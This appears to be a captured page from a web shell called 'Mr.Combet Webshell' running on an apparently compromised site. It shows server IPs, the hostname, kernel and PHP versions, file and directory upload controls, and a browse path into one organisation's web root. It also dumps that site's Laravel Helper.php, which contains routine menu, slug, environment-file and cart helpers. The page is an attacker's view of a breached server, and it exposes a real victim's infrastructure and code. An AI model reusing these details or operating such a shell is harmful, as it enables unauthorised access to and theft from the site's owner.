Mr.Combet Webshell
Your IP :
3.145.175.114
Server IP :
185.136.159.155
Server :
Linux 185-136-159-155.cprapid.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software :
Apache
PHP Version :
8.1.29
Add File :
Submit
Add Directory :
Submit
Dir :
~
/
home
/
jaibalajigroup
/
www
/
core
/
app
/
Http
/
Helpers
/
View File Name :
Helper.php
<?php use App\BasicExtra; use App\Page; if (! function_exists('setEnvironmentValue')) { function setEnvironmentValue(array $values) { $envFile = app()->environmentFilePath(); $str = file_get_contents($envFile); if (count($values) > 0) { foreach ($values as $envKey => $envValue) { $str .= "\n"; // In case the searched variable is in the last line without \n $keyPosition = strpos($str, "{$envKey}="); $endOfLinePosition = strpos($str, "\n", $keyPosition); $oldLine = substr($str, $keyPosition, $endOfLinePosition - $keyPosition); // If key does not exist, add it if (!$keyPosition || !$endOfLinePosition || !$oldLine) { $str .= "{$envKey}={$envValue}\n"; } else { $str = str_replace($oldLine, "{$envKey}={$envValue}", $str); } } } $str = substr($str, 0, -1); if (!file_put_contents($envFile, $str)) return false; return true; } } if (! function_exists('convertUtf8')) { function convertUtf8( $value ) { return mb_detect_encoding($value, mb_detect_order(), true) === 'UTF-8' ? $value : mb_convert_encoding($value, 'UTF-8'); } } if (! function_exists('make_slug')) { function make_slug($string) { $slug = preg_replace('/\s+/u', '-', trim($string)); $slug = str_replace("/","",$slug); $slug = str_replace("?","",$slug); return $slug; } } if (! function_exists('make_input_name')) { function make_input_name($string) { return preg_replace('/\s+/u', '_', trim($string)); } } if (! function_exists('serviceCategory')) { function serviceCategory() { $hbex = BasicExtra::first(); if($hbex->service_category == 1){ return true; } else { return false; } } } if (!function_exists('slug_create') ) { function slug_create($val) { $slug = preg_replace('/\s+/u', '-', trim($val)); $slug = str_replace("/","",$slug); $slug = str_replace("?","",$slug); return $slug; } } if (!function_exists('getHref') ) { function getHref($link) { $href = "#"; if ($link["type"] == 'home') { $href = route('front.index'); } else if ($link["type"] == 'services' || $link["type"] == 'services-megamenu') { $href = route('front.services'); } else if ($link["type"] == 'packages') { $href = route('front.packages'); } else if ($link["type"] == 'portfolios' || $link["type"] == 'portfolios-megamenu') { $href = route('front.portfolios'); } else if ($link["type"] == 'team') { $href = route('front.team'); } else if ($link["type"] == 'career') { $href = route('front.career'); } else if ($link["type"] == 'courses' || $link["type"] == 'courses-megamenu') { $href = route('courses'); } else if ($link["type"] == 'events' || $link["type"] == 'events-megamenu') { $href = route('front.events'); } else if ($link["type"] == 'causes' || $link["type"] == 'causes-megamenu') { $href = route('front.causes'); } else if ($link["type"] == 'knowledgebase') { $href = route('front.knowledgebase'); } else if ($link["type"] == 'calendar') { $href = route('front.calendar'); } else if ($link["type"] == 'gallery') { $href = route('front.gallery'); } else if ($link["type"] == 'faq') { $href = route('front.faq'); } else if ($link["type"] == 'products' || $link["type"] == 'products-megamenu') { $href = route('front.product'); } else if ($link["type"] == 'cart') { $href = route('front.cart'); } else if ($link["type"] == 'checkout') { $href = route('front.checkout'); } else if ($link["type"] == 'blogs' || $link["type"] == 'blogs-megamenu') { $href = route('front.blogs'); } else if ($link["type"] == 'rss') { $href = route('front.rss'); } else if ($link["type"] == 'feedback') { $href = route('feedback'); } else if ($link["type"] == 'contact') { $href = route('front.contact'); } else if ($link["type"] == 'custom') { if (empty($link["href"])) { $href = "#"; } else { $href = $link["href"]; } } else { $pageid = (int)$link["type"]; $page = Page::find($pageid); if (!empty($page)) { $href = route('front.dynamicPage', [$page->slug]); } else { $href = '#'; } } return $href; } } if (!function_exists('create_menu') ) { function create_menu($arr) { echo '<ul style="z-index: 0;">'; foreach ($arr["children"] as $el) { // determine if the class is 'submenus' or not $class = null; if (array_key_exists("children", $el)) { $class = 'class="submenus"'; } // determine the href $href = getHref($el); echo '<li '.$class.'>'; echo '<a href="'.$href.'" target="'.$el["target"].'">'.$el["text"].'</a>'; if (array_key_exists("children", $el)) { create_menu($el); } echo '</li>'; } echo '</ul>'; } } if (!function_exists('hex2rgb') ) { function hex2rgb( $colour ) { if ( $colour[0] == '#' ) { $colour = substr( $colour, 1 ); } if ( strlen( $colour ) == 6 ) { list( $r, $g, $b ) = array( $colour[0] . $colour[1], $colour[2] . $colour[3], $colour[4] . $colour[5] ); } elseif ( strlen( $colour ) == 3 ) { list( $r, $g, $b ) = array( $colour[0] . $colour[0], $colour[1] . $colour[1], $colour[2] . $colour[2] ); } else { return false; } $r = hexdec( $r ); $g = hexdec( $g ); $b = hexdec( $b ); return array( 'red' => $r, 'green' => $g, 'blue' => $b ); } } if (!function_exists('onlyDigitalItemsInCart')) { function onlyDigitalItemsInCart() { $cart = session()->get('cart'); if (!empty($cart)) { foreach ($cart as $key => $cartItem) { if (array_key_exists('type', $cartItem) && $cartItem['type'] != 'digital') { return false; } } } return true; } } if (!function_exists('containsDigitalItemsInCart')) { function containsDigitalItemsInCart() { $cart = session()->get('cart'); if (!empty($cart)) { foreach ($cart as $key => $cartItem) { if (array_key_exists('type', $cartItem) && $cartItem['type'] == 'digital') { return true; } } } return false; } } if (!function_exists('onlyDigitalItems')) { function onlyDigitalItems($order) { $oitems = $order->orderitems; foreach ($oitems as $key => $oitem) { if ($oitem->product->type != 'digital') { return false; } } return true; } } if (!function_exists('containsDigitalItem')) { function containsDigitalItem($order) { $oitems = $order->orderitems; foreach ($oitems as $key => $oitem) { if ($oitem->product->type == 'digital') { return true; } } return false; } } if (!function_exists('cartLength')) { function cartLength() { $length = 0; if (session()->has('cart') && !empty(session()->get('cart'))) { $cart = session()->get('cart'); foreach ($cart as $key => $cartItem) { $length += (float)$cartItem['qty']; } } return round($length, 2); } } if (!function_exists('cartTotal')) { function cartTotal() { $total = 0; if (session()->has('cart') && !empty(session()->get('cart'))) { $cart = session()->get('cart'); foreach ($cart as $key => $cartItem) { $total += (float)$cartItem['price'] * (float)$cartItem['qty']; } } return round($total, 2); } } if (!function_exists('cartSubTotal')) { function cartSubTotal() { $coupon = session()->has('coupon') && !empty(session()->get('coupon')) ? session()->get('coupon') : 0; $cartTotal = cartTotal(); $subTotal = $cartTotal - $coupon; return round($subTotal, 2); } } if (!function_exists('tax')) { function tax() { $bex = BasicExtra::first(); $tax = $bex->tax; if (session()->has('cart') && !empty(session()->get('cart'))) { $tax = (cartSubTotal() * $tax) / 100; } return round($tax, 2); } } if (!function_exists('coupon')) { function coupon() { return session()->has('coupon') && !empty(session()->get('coupon')) ? round(session()->get('coupon'), 2) : 0.00; } }